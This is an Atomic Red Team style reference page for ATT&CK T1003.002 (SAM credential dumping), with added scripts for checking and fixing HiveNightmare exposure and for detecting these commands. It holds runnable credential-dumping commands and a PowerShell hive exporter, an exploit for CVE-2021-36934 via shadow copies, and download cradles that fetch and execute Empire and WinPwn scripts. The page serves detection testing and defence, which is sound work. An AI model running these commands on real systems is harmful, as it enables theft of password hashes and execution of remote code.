# T1003.002 - OS Credential Dumping: Security Account Manager

## Description from ATT&CK

> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
>
> A number of tools can be used to retrieve the SAM file through in-memory techniques:
>
> * pwdumpx.exe
> * [gsecdump](https://attack.mitre.org/software/S0008)
> * [Mimikatz](https://attack.mitre.org/software/S0002)
> * secretsdump.py
>
> Alternatively, the SAM can be extracted from the Registry with Reg:
>
> * reg save HKLM\sam sam
> * reg save HKLM\system system
>
> Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
>
> Notes:
>
> * RID 500 account is the local, built-in administrator.
> * RID 501 is the guest account.
> * User accounts start with a RID of 1,000+.
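The description's registry path (`reg save` of the hives, then offline parsing) hides a failure mode worth checking for in a lab: `reg save` only works because `RegSaveKey` runs under SeBackupPrivilege, which is why an elevated prompt succeeds even though the DACL on `HKLM\SAM\SAM` denies read access to Administrators; a non-elevated prompt gets "Access is denied" and leaves nothing usable behind. The script below is an added example, not code from ATT&CK or the Atomic Red Team test: it saves the three hives and confirms each output file carries the `regf` hive signature before it is handed to creddump7 or secretsdump.py. The output directory and the function names are assumptions.

```powershell
# Added example (not from ATT&CK or Atomic Red Team). Saves SAM, SYSTEM and
# SECURITY with reg.exe and verifies each file is a real binary hive.
# Assumption: output goes to %TEMP%\hives; function names are mine.

function Test-Elevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Export-LocalHive {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][ValidateSet('SAM', 'SYSTEM', 'SECURITY')][string]$Hive,
        [string]$OutDir = (Join-Path $env:TEMP 'hives')   # assumed output location
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $out = Join-Path $OutDir $Hive.ToLower()
    # /y overwrites silently so a partial file from an earlier run cannot survive
    # and be mistaken for a fresh dump.
    & reg.exe save "HKLM\$Hive" $out /y | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "reg save HKLM\$Hive failed with exit code $LASTEXITCODE (elevated: $(Test-Elevated))"
    }
    $out
}

function Test-RegistryHiveFile {
    param([Parameter(Mandatory)][string]$Path)
    # Every registry hive file begins with the 4-byte signature "regf". A .reg
    # text export (what "reg export" writes) begins with "Windows Registry
    # Editor" instead and cannot be parsed by creddump7 or secretsdump.py.
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $sig = New-Object byte[] 4
        $n = $fs.Read($sig, 0, 4)
    } finally { $fs.Dispose() }
    ($n -eq 4) -and ([System.Text.Encoding]::ASCII.GetString($sig) -eq 'regf')
}

# Usage (elevated prompt): dump all three hives and report what landed on disk.
foreach ($hive in 'SAM', 'SYSTEM', 'SECURITY') {
    $file = Export-LocalHive -Hive $hive
    [pscustomobject]@{
        Hive      = $hive
        File      = $file
        Bytes     = (Get-Item -LiteralPath $file).Length
        ValidHive = Test-RegistryHiveFile -Path $file
    }
}
```

`ValidHive` should read `True` for all three rows; a `False` with a non-zero byte count usually means the file is a text export or a truncated copy rather than a hive.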
[Source](https://attack.mitre.org/techniques/T1003/002)

## Atomic Tests

- [Atomic Test #1: Registry dump of SAM, creds, and secrets](#atomic-test-1-registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2: Registry parse with pypykatz](#atomic-test-2-registry-parse-with-pypykatz)
- [Atomic Test #3: esentutl.exe SAM copy](#atomic-test-3-esentutlexe-sam-copy)
- [Atomic Test #4: PowerDump Hashes and Usernames from Registry](#atomic-test-4-powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5: dump volume shadow copy hives with certutil](#atomic-test-5-dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6: dump volume shadow copy hives with System.IO.File](#atomic-test-6-dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7-winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8-dumping-of-sam-creds-and-secretsreg-export)

### Atomic Test #1: Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. The saved hives can then be processed locally using https://github.com/Neohapsis/creddump7.

Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

**Supported Platforms:** Windows

**auto_generated_guid:** `5c2571d0-1572-416d-9676-812e64ca9f44`

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```

#### Cleanup Commands

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```

### Atomic Test #2: Registry parse with pypykatz

Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

Note that the command below runs `pypykatz live lsa`, which parses LSASS process memory (the in-memory technique from the description). The registry-hive path in pypykatz is `pypykatz live registry`, which reads SAM, SYSTEM and SECURITY through the registry API; either variant requires an elevated prompt.

**Supported Platforms:** Windows

**auto_generated_guid:** `a96872b2-cbf3-46cf-8eb4-27e8c0e85263`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 |

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```

#### Dependencies: Run with `powershell`!

##### Description: Computer must have python 3 installed

###### Check Prereq Commands

```powershell
if (Get-Command py -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```

##### Description: Computer must have venv configured at #{venv_path}

###### Check Prereq Commands

```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
py -m venv "#{venv_path}"
```

##### Description: pypykatz must be installed

###### Check Prereq Commands

```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```

### Atomic Test #3: esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility. This can also be used to copy other files and hives like
SYSTEM, NTUSER.dat etc. The `/vss` switch makes esentutl read the source through a Volume Shadow Copy, which is how it copies a hive file the kernel holds open and locked; this is why the test needs an elevated prompt.

**Supported Platforms:** Windows

**auto_generated_guid:** `a90c2f4d-6726-444e-99d2-a00cd7c20480`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM |
| file_name | Name of the copied file | string | SAM |
| copy_dest | Destination of the copied file | string | %temp% |

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```

#### Cleanup Commands

```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```

### Atomic Test #4: PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

**Supported Platforms:** Windows

**auto_generated_guid:** `804f28fc-68fc-40da-b5a2-e9d0bce5c193`

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
```

#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location

###### Check Prereq Commands

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```

### Atomic Test #5: dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account, but only while two conditions hold: the hive files under `%SystemRoot%\System32\config` still carry the weak ACL that grants BUILTIN\Users read access, and at least one volume shadow copy of the system volume exists (the live hive is locked, its copy inside the snapshot is not). On a patched or remediated host the copy fails with access denied and the final `dir` lists nothing.

[CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

**Supported Platforms:** Windows

**auto_generated_guid:** `eeb9751a-d598-42d3-b11c-c122d9c3f6c7`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |

#### Attack Commands: Run with `command_prompt`!

```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
```

#### Cleanup Commands

```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```

### Atomic Test #6: dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File. This exercises the same CVE-2021-36934 condition as Test #5 without spawning certutil, so it is a useful check that detection does not depend on that one binary.
[CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

**Supported Platforms:** Windows

**auto_generated_guid:** `9d77fed7-05f8-476e-a81b-8ff0472c64d0`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |

#### Attack Commands: Run with `powershell`!

```powershell
1..#{limit} | % {
  try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}", "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
  ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```

#### Cleanup Commands

```powershell
1..#{limit} | % { rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore }
```

### Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via the `samfile` function of WinPwn. The first line is a download cradle that fetches and executes the script from GitHub, so the test requires outbound HTTPS access and generates network as well as process telemetry.

**Supported Platforms:** Windows

**auto_generated_guid:** `0c0f5f06-166a-4f4d-bb4a-719df9a01dbb`

#### Attack Commands: Run with `powershell`!

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```

### Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses `reg export` instead of `reg save` to generate the behavior.

Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Two caveats when using this variant for anything beyond generating telemetry: `reg export` writes a text `.reg` file rather than a binary hive, so its output cannot be handed to creddump7 or secretsdump.py; and because `reg export` enumerates keys with ordinary registry read access rather than the backup privilege that `reg save` uses, the protected `HKLM\SAM\SAM` and `HKLM\SECURITY` subtrees are not readable from a merely elevated (non-SYSTEM) prompt, so expect access-denied errors or an export that lacks the account data.

**Supported Platforms:** Windows

**auto_generated_guid:** `21df41be-cdd8-4695-a650-c3981113aa3c`

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
```

#### Cleanup Commands

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
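Tests #5 and #6 only succeed while a host is still in the CVE-2021-36934 state, and the interesting question for a defender is whether that is true of their fleet. The script below is an added example, not part of the Atomic Red Team page: it reports whether the hive files' ACLs let non-admins read them and whether any shadow copy exists to read them from, and it wraps the two-part workaround Microsoft published (re-enable ACL inheritance under `System32\config`, then delete existing shadow copies, since snapshots keep the old ACL). The function names are mine; the `icacls` and `vssadmin` invocations are the documented workaround. Run it from an elevated prompt so the DACL and the snapshot list can be read.

```powershell
# Added example (not from Atomic Red Team): exposure check and remediation for
# the HiveNightmare / SeriousSAM condition that Tests #5 and #6 exploit.
# Both must hold for those tests to work:
#   1. BUILTIN\Users (or Everyone) has read access on the hive files, and
#   2. at least one volume shadow copy exists (the live hive is locked, the
#      copy inside the snapshot is not).

function Get-HiveAclExposure {
    param([string[]]$Hive = @('SAM', 'SYSTEM', 'SECURITY'))
    foreach ($name in $Hive) {
        $path = Join-Path $env:SystemRoot "System32\config\$name"
        # Reading the DACL needs READ_CONTROL; a non-admin caller on a hardened
        # host gets access denied here, which by itself means "not exposed".
        $acl  = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
        $weak = @()
        if ($acl) {
            $weak = @($acl.Access | Where-Object {
                ($_.AccessControlType -eq 'Allow') -and
                ($_.IdentityReference.Value -in @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')) -and
                ([int]$_.FileSystemRights -band [int][System.Security.AccessControl.FileSystemRights]::ReadData)
            })
        }
        [pscustomobject]@{
            Hive            = $name
            NonAdminCanRead = ($weak.Count -gt 0)
            WeakACEs        = ($weak | ForEach-Object { "$($_.IdentityReference)=$($_.FileSystemRights)" }) -join '; '
        }
    }
}

function Get-ShadowCopyCount {
    # Win32_ShadowCopy enumerates VSS snapshots; enumeration requires admin.
    @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue).Count
}

function Test-HiveNightmare {
    $acl     = @(Get-HiveAclExposure)
    $shadows = Get-ShadowCopyCount
    $weak    = @($acl | Where-Object NonAdminCanRead)
    [pscustomobject]@{
        WeakAclHives = ($weak.Hive -join ', ')
        ShadowCopies = $shadows
        Exposed      = (($weak.Count -gt 0) -and ($shadows -gt 0))
        Detail       = $acl
    }
}

function Repair-HiveNightmare {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    # Part 1: re-enable inheritance so the hive files take the admin-only ACL
    # of the config directory.
    if ($PSCmdlet.ShouldProcess("$env:SystemRoot\System32\config\*.*", 'icacls /inheritance:e')) {
        icacls "$env:SystemRoot\System32\config\*.*" /inheritance:e | Out-Null
    }
    # Part 2: remove snapshots that still hold readable copies of the hives.
    # Create a fresh restore point afterwards if the host relies on System Restore.
    if ($PSCmdlet.ShouldProcess("shadow copies of $env:SystemDrive", 'vssadmin delete shadows')) {
        vssadmin delete shadows "/for=$env:SystemDrive" /all /quiet | Out-Null
    }
}

# Usage (elevated): report first, then remediate only if exposed.
$state = Test-HiveNightmare
$state | Select-Object WeakAclHives, ShadowCopies, Exposed
if ($state.Exposed) { Repair-HiveNightmare -WhatIf }   # drop -WhatIf to apply
```

A quick manual equivalent of the ACL half is `icacls $env:SystemRoot\System32\config\SAM`: a line containing `BUILTIN\Users:(I)(RX)` is the vulnerable state. The workaround is a stopgap; the fix is the OS update, and the remediation above does nothing about hive copies an attacker already exfiltrated.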
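Every test on this page leaves a distinctive process command line behind, which makes the page a ready-made validation set for detection content. The block below is an added example, not part of the Atomic Red Team page: a small rule set covering Tests #1 through #8, run over constructed sample process-creation events. In production the `CommandLine` field would come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled; the event objects, rule names and sample lines here are mine, and the benign lookalikes at the end show what the rules are designed not to fire on.

```powershell
# Added example (not from Atomic Red Team): command-line detection rules for the
# SAM-dumping variants exercised on this page, checked against constructed
# sample events. Rule names and samples are mine.

$SamDumpRules = @(
    @{ Name    = 'reg save/export of SAM, SYSTEM or SECURITY hive (Tests #1, #8)'
       Pattern = '(?i)\breg(\.exe)?\s+(save|export)\s+"?(HKLM|HKEY_LOCAL_MACHINE)\\(sam|system|security)\b' }
    @{ Name    = 'esentutl /vss copy of a locked hive file (Test #3)'
       Pattern = '(?i)\besentutl(\.exe)?\b.*\s/vss\b.*[\\/]config[\\/](sam|system|security)\b' }
    @{ Name    = 'hive read through a shadow-copy device path, CVE-2021-36934 (Tests #5, #6)'
       Pattern = '(?i)\\Device\\HarddiskVolumeShadowCopy[^\\\s]*\\Windows\\System32\\config\\(sam|system|security)\b' }
    @{ Name    = 'pypykatz live LSA parsing (Test #2)'
       Pattern = '(?i)\bpypykatz(\.exe)?"?\s+live\s+lsa\b' }
    @{ Name    = 'WinPwn download cradle followed by samfile (Test #7)'
       Pattern = '(?i)WinPwn\.ps1.*\bsamfile\b' }
)

function Test-SamDumpCommandLine {
    # Emits the name of every rule the command line matches and nothing for a
    # clean line; wrap the call in @() so an empty result has .Count -eq 0.
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($rule in $SamDumpRules) {
        if ($CommandLine -match $rule.Pattern) { $rule.Name }
    }
}

# Constructed sample events (not real telemetry): one per technique on the page,
# followed by benign lookalikes that must not alert.
$SampleEvents = @(
    @{ Image = 'C:\Windows\System32\reg.exe';      CommandLine = 'reg save HKLM\sam C:\Users\bob\AppData\Local\Temp\sam' }
    @{ Image = 'C:\Windows\System32\reg.exe';      CommandLine = 'reg.exe export HKLM\security C:\Users\bob\AppData\Local\Temp\security' }
    @{ Image = 'C:\Windows\System32\esentutl.exe'; CommandLine = 'esentutl.exe /y /vss C:\Windows/system32/config/SAM /d C:\Users\bob\AppData\Local\Temp/SAM' }
    @{ Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Users\bob\AppData\Local\Temp\SAMvss1 2' }
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -nop -c "1..10 | % { try { [System.IO.File]::Copy(\"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SYSTEM\", \"$env:TEMP\SYSTEMvss$_\", \"true\") } catch {} }"' }
    @{ Image = 'C:\Tools\venv_t1003_002\Scripts\pypykatz.exe'; CommandLine = '"C:\Tools\venv_t1003_002\Scripts\pypykatz" live lsa' }
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -c "iex(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1''); samfile -consoleoutput -noninteractive"' }
    # Benign: an application hive backup, a database repair, a file hash.
    @{ Image = 'C:\Windows\System32\reg.exe';      CommandLine = 'reg save HKLM\SOFTWARE\Contoso C:\Backup\contoso.hiv /y' }
    @{ Image = 'C:\Windows\System32\esentutl.exe'; CommandLine = 'esentutl.exe /p C:\ProgramData\Contoso\data.edb' }
    @{ Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil -hashfile C:\Users\bob\Downloads\setup.exe SHA256' }
)

$results = foreach ($event in $SampleEvents) {
    $hits    = @(Test-SamDumpCommandLine -CommandLine $event.CommandLine)
    $verdict = if ($hits.Count -gt 0) { 'ALERT' } else { 'ok' }
    [pscustomobject]@{
        Verdict     = $verdict
        Rule        = ($hits -join '; ')
        CommandLine = $event.CommandLine
    }
}
$results | Format-Table -AutoSize -Wrap
```

The first seven rows should report `ALERT` with exactly one rule each and the last three `ok`. The shadow-copy rule deliberately matches `HarddiskVolumeShadowCopy$_` and `%a` as well as a digit, because the logged command line of the parent `powershell.exe` or `cmd.exe` carries the loop variable, not the expanded index; only the child `certutil.exe` event shows a number.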